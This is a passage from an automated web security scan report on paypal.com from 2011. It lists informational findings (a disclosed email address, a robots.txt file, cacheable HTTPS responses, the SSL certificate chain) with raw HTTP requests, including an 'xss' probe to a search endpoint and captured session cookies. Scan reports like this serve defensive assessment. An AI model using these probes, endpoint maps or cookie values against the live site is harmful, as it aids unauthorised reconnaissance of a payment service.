Set-Cookie: feel_cookie=a%205%20_help%20b%200%20%20c%207%20helpscr%20d%200%20%20e%200%20%20f%200%20%20g%205%20en_US%20h%200%20%20i%2030%20xpt%2fHelp%2fhelpcenter%2fHelpCenter%20j%200%20%20k%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20l%200%20%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63232

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<A href="mailto:%20payflow-support@paypal.com">payflow-support@paypal.com</A>
...[SNIP]...
<A href="mailto:%20payflow-support@paypal.com">payflow-support@paypal.com</A>
...[SNIP]...
<A href="mailto:payflowsales@paypal.com">payflowsales@paypal.com</A>
...[SNIP]...
<A href="mailto: gateway-ausupport@paypal.com">gateway-ausupport@paypal.com</A>
...[SNIP]...

10.2. https://www.paypal.com/us/cgi-bin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/

Issue detail

The following email address was disclosed in the response:

name@domain.com

Request

Response

11. Robots.txt file previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/en_US/i/pui/core/login_body_bg.jpg

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.paypal.com

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:22:29 GMT
Server: Apache
Last-Modified: Wed, 31 Mar 2010 21:55:38 GMT
Accept-Ranges: bytes
Content-Length: 374
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/plain

### BEGIN FILE ###

# PayPal robots.txt file

User-agent: *
Disallow: /xclick-auction/
Disallow: /affil/
Disallow: /*?cmd=_flow
Disallow: /*?SESSION
Disallow: /*?cmd=_s-xclick
Disallow: /subscription
...[SNIP]...

12. Cacheable HTTPS response previous next
There are 14 instances of this issue:

/ca/cgi-bin/webscr
/cgi-bin/helpscr
/cgi-bin/helpweb
/cgi-bin/searchscr
/cgi-bin/webscr
/express-checkout-buttons
/helpcenter/main.jsp
/us/cgi-bin/
/us/cgi-bin/helpscr
/us/cgi-bin/helpweb
/us/cgi-bin/marketingweb
/us/cgi-bin/searchscr
/us/cgi-bin/webscr
/us/searchscr

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

12.1. https://www.paypal.com/ca/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/ca/cgi-bin/webscr

Request

Response

12.2. https://www.paypal.com/cgi-bin/helpscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/helpscr

Request

GET /cgi-bin/helpscr?cmd=_help&t=escalateTab HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.3. https://www.paypal.com/cgi-bin/helpweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/helpweb

Request

Response

12.4. https://www.paypal.com/cgi-bin/searchscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/searchscr

Request

GET /cgi-bin/searchscr?cmd=_sitewide-search HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.5. https://www.paypal.com/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/webscr

Request

Response

12.6. https://www.paypal.com/express-checkout-buttons previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/express-checkout-buttons

Request

GET /express-checkout-buttons HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.7. https://www.paypal.com/helpcenter/main.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/helpcenter/main.jsp

Request

Response

12.8. https://www.paypal.com/us/cgi-bin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/

Request

Response

12.9. https://www.paypal.com/us/cgi-bin/helpscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/helpscr

Request

GET /us/cgi-bin/helpscr?cmd=_help&t=escalateTab HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.10. https://www.paypal.com/us/cgi-bin/helpweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/helpweb

Request

Response

12.11. https://www.paypal.com/us/cgi-bin/marketingweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/marketingweb

Request

Response

12.12. https://www.paypal.com/us/cgi-bin/searchscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/searchscr

Request

Response

12.13. https://www.paypal.com/us/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/webscr

Request

Response

12.14. https://www.paypal.com/us/searchscr previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/searchscr

Request

GET /us/searchscr?cmd=_suggestion-search&queryString=xss HTTP/1.1
Host: www.paypal.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=OGXUOFHbwQ9WE3sALZ1qIFid-EZw9v8a_qL0LLVFCQKL5SI2sHzGcjrqppn1hBQoGV8q5Xx7qjDOH9OJ; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.198.1313112159974960; cwrClyrK4LoCV1fydGbAxiNL6iG=%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c; s_sess=%20s_ppv%3D100%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B; s_pers=%20tr_p1%3Dsite%2520wide%2520search%2520results%7C1313161980846%3B%20gpv_events%3DFailure%7C1313161980862%3B%20gpv_c43%3Dsite%2520wide%2520search%2520results%7C1313161983325%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:42:17 GMT
Server: Apache
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 0

13. SSL certificate previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.paypal.com
Issued by:	VeriSign Class 3 Extended Validation SSL CA
Valid from:	Tue Mar 22 18:00:00 GMT-06:00 2011
Valid to:	Mon Apr 01 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by XSS.CX at Fri Aug 12 09:24:05 GMT-06:00 2011.